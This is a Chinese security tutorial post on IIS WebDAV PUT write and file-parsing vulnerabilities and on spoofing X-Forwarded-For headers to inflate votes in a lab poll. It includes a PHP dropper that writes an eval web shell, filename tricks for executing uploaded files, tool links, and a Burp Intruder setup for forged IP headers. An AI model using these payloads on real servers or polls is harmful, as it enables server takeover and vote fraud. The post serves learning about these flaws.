首页 > 其他 > 详细

IIS写权限漏洞和XFF刷票原理

时间:2019-05-16 13:49:19      阅读:166      评论:0      收藏:0      [点我收藏+]

IIS写权限漏洞

PUT写入漏洞

此漏洞主要是因为服务器开启了webdav的组件导致的

1.扫描漏洞,yes,可以PUT:

技术分享图片

2.用老兵的工具上传一句话文件test.txt,然后move改名为shell.asp

技术分享图片

技术分享图片

然后菜刀连接成功:

技术分享图片

解析漏洞

影响版本:6.0、7.0、7.5

IIS 6.0解析利用方法有两种

1.目录解析

/xx.asp/xx.jpg

在网站下建立文件夹的名字为 .asp或.asa 的文件夹

其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行

2.文件解析

修改一句话文件名为test.asp;.jpg

在IIS6.0下,分号后面的不被解析,也就是说test.asp;.jpg会被服务器看成是mst.asp

还有IIS6.0 默认的可执行文件,除了asp还包含这三种:/mst.asa/mst.cer/mst.cdx

 

IIS 7.0/7.5畸形解析漏洞

在默认Fast-CGI开启状况下,黑阔上传一个名字为mst.jpg文件

内容为:

<?php
fputs(fopen(‘shell.php’,’w’),‘<?php eval($_POST[wintry])?>’);
?>

然后访问mst.jpg/.php,在这个目录下就会生成一句话木马 shell.php

用到两个工具(完全可以用Burp替代):

1、IIS PUT Scaner By ZwelL 2、桂林老兵IIS写权限利用程序

https://pan.baidu.com/s/1PU70q4unoHt0S01oyuFnKw

第二个写入工具百度云不能分享,自行用Burp代替吧

X-Forwarded-For 刷票原理

刷票的原理是通过X-Forwarded-For(XFF)实现的。

X-Forwarded-For 是一个 HTTP 扩展头部,主要是为了让 Web 服务器获取访问用户的真实 IP 地址。

一些开发者为了获取客户IP,我们经常会使用request.remote_ip来获得用户IP。

但是很多用户都是通过代理来访问服务器的,如果使用remote_ip这个全局变量来获取IP

开发者往往获得的是代理服务器的IP,并不是用户真正的IP。

                客户端=>正向代理=>透明代理=>服务器反向代理=>Web服务器

下面通过一个例子来实践

实践伪造 XFF

环境链接:点击传送

打开实验环境,是个投票系统,a2019现在是88票第4名,伪造XFF刷到第一名

点击给a2019投票,Burp抓包添加X-Forwarded-For字段,Intruder功能爆破重放

X-Forwarded-For:10.1.§0§.§1§

因为是微信投票,修改User-Agent为:

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 MicroMessenger/6.0NetType/2G

 

IIS写权限漏洞和XFF刷票原理

原文:https://www.cnblogs.com/wintrysec/p/10875060.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!